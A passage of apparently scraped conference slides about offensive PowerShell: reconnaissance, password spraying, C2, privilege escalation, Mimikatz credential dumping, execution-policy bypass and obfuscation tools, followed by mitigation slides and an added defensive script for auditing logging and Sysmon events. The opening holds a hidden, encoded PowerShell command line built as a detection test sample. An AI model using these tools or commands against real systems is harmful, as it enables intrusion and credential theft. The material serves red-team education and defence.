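$sampleB64    = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($sampleScript))
Test-PowerShellCommandLine -CommandLine "powershell.exe -NoP -W Hidden -enc $sampleB64"
```

Security 4688 events carry the same CommandLine field when process command-line auditing is enabled, so the same triage applies to hosts without Sysmon.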
  • 17. PS C:> Get-Attack-Scenario.ps1_ Reconnaissance Scanning Gaining Access Maintaining Access Covering Tracks Reporting Scanning += Remote Attacks PPP – Phishing PowerShell Payloads Command and Control Privilege Escalation Network Exploitation += Domain Exploitation Post Exploitation
  • 18. PS C:> Get-Attack.ps1 SCANNING += REMOTE ATTACKS
  • 19. PS C:> PSNmap.ps1_ • Linux nmap for PowerShell (almost). • Ping sweeps and scans a network for specified open ports. • Can also perform DNS lookups. • Author(s) • @joakimbs • https://www.powershellgallery.com/packages/PSnmap/1.2
  • 20. PS C:> PowerMeta.ps1_ • Discover publicly available files • Extract Metadata from them • Can provide information about: • The internal username schema • System names • Domain info • Author(s): • Beau Bullock (@dafthack) • https://github.com/dafthack/PowerMeta Full Names Possible Username
  • 21. PS C:> OWAAttackFlow.ps1_ Starting With Nothing and 100% Remote: Reconnaissance • OWA Target Acquisition • Internal Domain Enumeration • Username Convention Discovery • Username Enumeration • Password Spraying • Acquire Global Address List • More Password Spraying • 2FA Bypass to Search Email • Congratulation, now you're H4ck3R!!!
  • 22. PS C:> MailSniper.ps1_ • Enumerate users/domain • Password spray OWA/EWS • Get Global Address List • Search email for certain terms • Passwords • Find VPN info • Reset 2FA keys or add new device • Author(s): • Beau Bullock (@dafthack) • https://github.com/dafthack/MailSniper
  • 23. PS C:> Get-Attack.ps1 PPP – PHISHING POWERSHELL PAYLOADS
  • 24. PS C:> PowerShell-Empire.ps1_ • PowerShell post-exploitation agent • Aims to provide a rapidly extensible platform to integrate offensive/defensive PowerShell work • Many capabilities: • Stagers/payloads, Lateral movement, persistence, etc. • Author(s): • Will Schroeder (@harmj0y) • Justin Warner (@sixdub) • Matt Nelson (@enigma0x3) • www.powershellempire.com
  • 25. PS C:> LuckyStrike.ps1_ • PowerShell based generator of malicious .doc and .xls documents; • All payloads are saved into a database for easy retrieval & embedding into a new or existing document; • Is a menu-driven PowerShell script that uses a sqlite database to store your payloads, code block dependencies, and working sessions in order to generate malicious documents. • Author(s): • Jason Lang (@curi0usJack) • https://github.com/curi0usJack/luckystrike
  • 27. PS C:> Invoke-C&C.ps1_ • Powercat - PowerShell version of Netcat; • Author(s): • Mick Douglas (@besimorhino), Luke Baggett & Jesse Davis (@secabstraction) • https://github.com/secabstraction/PowerCat • Invoke-PowerShellIcmp – C2 channel over ICMP echoes and replies; • Author(s): • Nikhil Mittal (@samratashok) • https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1 • Dnscat2-PowerShell – C2 channel over DNS requests; • Author(s): • Ron Bowes (@iagox86) • https://github.com/lukebaggett/dnscat2-powershell
  • 29. PS C:> PowerUp.ps1_ • Performs a number of local privilege escalation checks • Checks for: • Unquoted service paths • Unattended Install Files • Service Permissions • Author(s): • Will Schroeder (@harmj0y) • https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
  • 30. PS C:> PowerUpSQL.ps1_ • SQL server discovery • Audit weak configurations • Perform privilege escalation to obtain SA privileges • Find sensitive data at scale • Attack Functions: • Invoke-SQLDumpInfo • Invoke-SQLAudit • Invoke-SQLEscalatePriv • Author(s): • Scott Sutherland (@_nullbind) • https://github.com/NetSPI/PowerUpSQL
  • 32. PS C:> Get-GPPPassword.ps1_ • Finds any passwords of accounts set by GPP • Usually the first thing I check • Almost always find an admin password here • Author(s): • Chris Campbell (@obscuresec) • https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
  • 33. PS C:> BloodHound.ps1_ • Enumerates/Gathers: • Local admins group on all systems • Active user sessions on each system • Group membership information • Domain trusts info • Find a path to domain admin • Author(s): • Andrew Robbins (@_wald0), Will Schroeder (@harmj0y) and Rohan Vazarkar (@CptJesus) • https://github.com/BloodHoundAD/BloodHound • https://github.com/SadProcessor/SomeStuff/blob/master/BloodHoundw64_LTI.ps1 [Windows Edition]
  • 34. PS C:> Find-LocalAdminAccess.ps1_ • Find a system on the network your user is a local admin of; • Author(s): • Will Schroeder (@harmj0y) • https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
  • 35. PS C:> Find-LocalAdminAccess.ps1_ • Tool for password spraying all domain users • Common Scenario: • Domain locks out accounts after a certain number of failed logins • Can’t brute force • Solution: • Try a number of passwords less than the domain lockout policy against EVERY account in the domain • Author(s): • Beau Bullock (@dafthack) • https://github.com/dafthack/DomainPasswordSpray
  • 37. PS C:> Invoke-Mimikatz.ps1_ • Dump cleartext credentials • Avoids writing to disk • Could sneakily dump creds from LSASS dumps from other systems • Author(s): • Joe Bialek (@JosephBialek) • Benjamin Delpy (@gentilkiwi) • https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
  • 38. PS C:> Invoke-ShareFinder.ps1_ • Sensitive files on shares? • ShareFinder then FileFinder • FileFinder will find files with the following strings in their title: • ‘*pass*’, ‘*sensitive*’, ‘*admin*’, ‘*secret*’, ‘*login*’, ‘*unattend*.xml’, ‘*.vmdk’, ‘*creds*’, or ‘*credential*’ • Author(s): • Will Schroeder (@harmj0y)
  • 42. PS C:> PowerOps.exe_ • C# application that has many PowerShell scripts built in: • PowerSploit • Nishang • GPPPassword • Empire • PowerCat • Author(s): • Rui Reis (@fdiskyou) • https://github.com/fdiskyou/PowerOPS
  • 43. PS C:> PowerShdll.ps1_ • Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls. • Requirements: • .Net v3.5 for dll mode. • .Net v2.0 for exe mode. • https://github.com/p3nt4/PowerShdll DLL Mode: EXE Mode:
  • 44. PS C:> PowerLessShell.py_ • PowerLessShell relies on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach. • To add another layer of crap the payload will copy msbuild.exe to something random and build the payload using the randomly generated binary. • You can provide the -knownprocess switch to use a known Windows process name instead of renaming MsBuild.exe to something random • https://github.com/Mr-Un1k0d3r/PowerLessShell
  • 46. PS C:> Invoke-BypassExecutionPolicy.ps1_ • Paste the Script into an Interactive PowerShell Console: • Use the Command Switch:
  • 47. PS C:> Invoke-BypassExecutionPolicy.ps1_ • Use the Invoke-Command Command: • Use the Invoke-Expression Command:
  • 48. PS C:> Invoke-BypassExecutionPolicy.ps1_ • Set the ExecutionPolicy for the CurrentUser Scope via the Registry • https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ • https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-5.1
  • 50. PS C:> S3t-0+‘B’+fu$C4t|0n.ps1_ • Command line args are what most monitoring tools alert on when powershell.exe is run • ‘LeT’+’s’+’ob’+’FusCa’+’te’ • Encode, concatenate, reorder, etc. • Author(s): • Daniel Bohannon (@danielbohannon) • https://github.com/danielbohannon/Invoke-Obfuscation
  • 51. PS C:> ISESteroids.ps1_ • ISESteroids 2.5.1.0 now ships with a PowerShell obfuscator that can scramble your code and make it hard to reverse-engineer; • To obfuscate a script, simply load a script and choose Tools/Obfuscate; • Dialog where you can set the level of obfuscation; • http://www.powertheshell.com/powershell-obfuscator/
  • 53. PS C:> Nishang.ps1_ • Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. • Nishang is useful during all phases of penetration testing. • ActiveDirectory • Antak - the Webshell • Backdoor • Bypass • Clients • Escalation • MITM • Pivot • https://github.com/samratashok/nishang
  • 54. PS C:> PowerSploit.ps1_ • PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: • Recon / CodeExecution • ScriptModification • Persistence • AntivirusBypass • Exfiltration • Mayhem =) • PrivEsc • https://github.com/PowerShellMafia/PowerSploit
  • 55. PS C:> PS>Attack.ps1_ • PS>Attack combines some of the best projects in the infosec PowerShell community into a self contained custom PowerShell console. • It's designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. • Contains over 100 commands for Privilege Escalation, Recon and Data Exfiltration. It does this by including the following modules and commands: • PowerSploit • Nishang • Powercat • Inveigh • Invoke-TheHash • https://github.com/jaredhaight/PSAttack
  • 56. PS C:> Get-Mitigation.ps1 SURPRISE, YOU’RE BUSTED! DO YOU REALLY?
  • 57. PS C:> Get-Mitigation.ps1_ • Disable: cmd.exe, PowerShell.exe, PowerShell_ISE.exe • Use AppWhitelisting. • Use Sysmon to monitor and alert for System.Management.Automation.dll • Could possibly disable csc.exe compilation tool. • Remove PowerShell v2 and Install PowerShell v5. • Constrained Language Mode
  • 58. PS C:> Get-Mitigation.ps1_ • Disable (cmd.exe, PowerShell.exe, PowerShell_ISE.exe): Possible Bypass! • Use AppWhitelisting: Possible Bypass! • Use Sysmon to monitor and alert for System.Management.Automation.dll: Possible Bypass! • Could possibly disable csc.exe compilation tool: Dangerous! • Remove PowerShell v2 and Install PowerShell v5. • Constrained Language Mode: PS C:> $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
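An added example, not from the slides, that audits and applies the controls on the two mitigation slides and the blue-team slide: the logging policy values, PowerShell 2.0 engine presence, the current language mode, and a Sysmon image-load search for System.Management.Automation loaded by a host other than the usual ones. The policy registry paths and the optional-feature name are the standard Windows ones; function names, the transcript directory and the list of normal hosts are assumptions.

```powershell
# Added example (not from the slides): audit and enable the mitigations listed on the
# Get-Mitigation and Get-Help-BlueTeam slides. Registry paths are the standard
# PowerShell policy keys; function names and the transcript directory are assumptions.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Get-PolicyValue {
    # Reads one value under the PowerShell policy key; $null when the key or value is absent.
    param([string]$SubKey, [string]$Name)
    $item = Get-ItemProperty -Path (Join-Path $PolicyRoot $SubKey) -Name $Name -ErrorAction SilentlyContinue
    if ($item) { $item.$Name } else { $null }
}

function Test-PSv2Engine {
    # The optional-feature query needs an elevated prompt; returns $null when it cannot be answered.
    $f = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    if ($f) { return ($f.State -eq 'Enabled') }
    return $null
}

function Get-PowerShellHardeningState {
    # One object a defender can diff against the intended baseline.
    [pscustomobject]@{
        ScriptBlockLogging = (Get-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        ModuleLogging      = (Get-PolicyValue 'ModuleLogging'      'EnableModuleLogging')      -eq 1
        Transcription      = (Get-PolicyValue 'Transcription'      'EnableTranscripting')      -eq 1
        TranscriptDir      = Get-PolicyValue 'Transcription' 'OutputDirectory'
        # v2 engine still present means "powershell -Version 2" sidesteps the v5 logging above
        V2EngineInstalled  = Test-PSv2Engine
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode
    }
}

function Enable-PowerShellLogging {
    # Turns on script block, module and transcription logging machine-wide (run elevated).
    param([string]$TranscriptDir = 'C:\PSTranscripts')
    foreach ($sub in 'ScriptBlockLogging', 'ModuleLogging', 'ModuleLogging\ModuleNames', 'Transcription') {
        New-Item -Path (Join-Path $PolicyRoot $sub) -Force | Out-Null
    }
    New-ItemProperty -Path "$PolicyRoot\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\ModuleLogging" -Name EnableModuleLogging -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null  # every module
    New-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableTranscripting -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableInvocationHeader -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\Transcription" -Name OutputDirectory -Value $TranscriptDir -PropertyType String -Force | Out-Null
}

function Find-UnmanagedPowerShellHost {
    # Sysmon Event 7 (image load): System.Management.Automation pulled into a process that is
    # not one of the normal hosts, which is what the "monitor the dll" bullet is after.
    param([int]$MaxEvents = 2000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data   = ([xml]$_.ToXml()).Event.EventData.Data
            $image  = ($data | Where-Object Name -eq 'Image').'#text'
            $loaded = ($data | Where-Object Name -eq 'ImageLoaded').'#text'
            if ($loaded -match '(?i)System\.Management\.Automation' -and
                $image -notmatch '(?i)\\(powershell|powershell_ise|pwsh)\.exe$') {
                [pscustomobject]@{ Time = $_.TimeCreated; Host = $image; Loaded = $loaded }
            }
        }
}

Get-PowerShellHardeningState
```

Sysmon only emits Event 7 when its configuration enables ImageLoad, so an empty result from Find-UnmanagedPowerShellHost is not evidence of a clean host.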
  • 59. PS C:> Get-Mitigation.ps1_ • https://goo.gl/fPCiJn Add Power to your PowerShell @techmentorevents • https://github.com/WiredPulse/PowerShell PowerScripts @WiredPulse • https://github.com/WiredPulse/PoSh-R2 PoSh-R2 @WiredPulse • https://github.com/sans-blue-team/DeepBlueCLI DeepBlueCLI @sans-blue-team • https://github.com/davehull/Kansa Kansa @davehull • https://github.com/mattifestation/PowerShellArsenal PowerShellArsenal @MattGraeber
  • 62. PS C:> Invoke-References.ps1_ • https://github.com/PowerShellMafia/PowerSploit/tree/dev/ • https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dcb5b • https://gallery.technet.microsoft.com/SAMRi10-Hardening-Remote-48d94b5b • https://github.com/davehull/Kansa • https://github.com/Invoke-IR/Uproot • https://github.com/mattifestation/PowerShellArsenal • https://github.com/mattifestation/PSReflect • https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick • https://pt.slideshare.net/dafthack/pwning-the-enterprise-with-powershell • http://lockboxx.blogspot.com.br/2016/03/powershell-for-pentesters-course.html • https://media.blackhat.com/eu-13/briefings/Mittal/bh-eu-13-powershell-for-penetration-mittal-slides.pdf • https://www.psattack.com/presentations/get-help-an-intro-to-powershell-and-how-to-use-it-for-evil/ • https://pt.slideshare.net/harmj0y/catch-me-if-you-can-powershell-red-vs-blue • https://pt.slideshare.net/harmj0y/building-an-empire-with-powershell • https://www.youtube.com/watch?v=uE8IAxM_BhE